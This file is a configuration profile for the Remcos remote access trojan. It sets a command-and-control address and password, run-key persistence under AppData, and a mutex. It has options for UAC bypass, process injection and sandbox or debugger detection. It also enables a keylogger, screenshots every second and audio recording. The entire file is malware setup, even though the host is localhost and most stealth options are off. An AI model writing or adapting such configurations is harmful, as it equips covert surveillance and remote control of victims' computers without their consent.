[Connection]
Num_Items=1
Connection0=127.0.0.1:1337:pass
AssignedName=Host
ConnectionInterval=5
ConnectionDelay=0
[Installation]
Install=0
InstallParentDir=AppData
InstallFolder=remcos
InstallFileName=remcos.exe
StartupValueName=remcos
CurrentUserRun=1
LocalMachineRun=0
ExplorerRun=0
UserinitStartup=0
ShellStartup=0
HideInstalledFile=0
MeltOriginal=0
Mutex=remcos_blxiaivscd
BypassUAC=0
DisableUAC=0
[Stealth]
VisibilityMode=Visible
Injection=No
InjectionCustomProcess=
DetectVMware=0
DetectVirtualBox=0
DetectSandboxie=0
DetectDebuggers=0
DetectProcessMonitor=0
DetectProcessExplorer=0
AnalysisReaction=Close
[Keylogger]
OfflineKeylogger=Disabled
FilterKeywords=
KeylogParentDir=AppData
KeylogFolder=remcos
KeylogFileName=logs.dat
CryptLog=0
HideLog=0
[ForceRelogin]
Enabled=0
Delay=0
OnlyOnFirstLaunch=1
[ScreenLogger]
ScreenshotOnTimeInterval=1
ScreenshotOnWindow=0
SaveEncrypted=0
ScreenshotFrequency=1
ScreenshotsParentDir=AppData
ScreenshotsFolder=ScreensRN
WindowTitles=
WindowCapFrequencyMinutes=0
WindowCapFrequencySeconds=5
[AudioCapture]
OfflineAudioCapture=0
FileLengthInMinutes=5
AudioFilesParentDir=AppData
AudioFilesFolder=audio
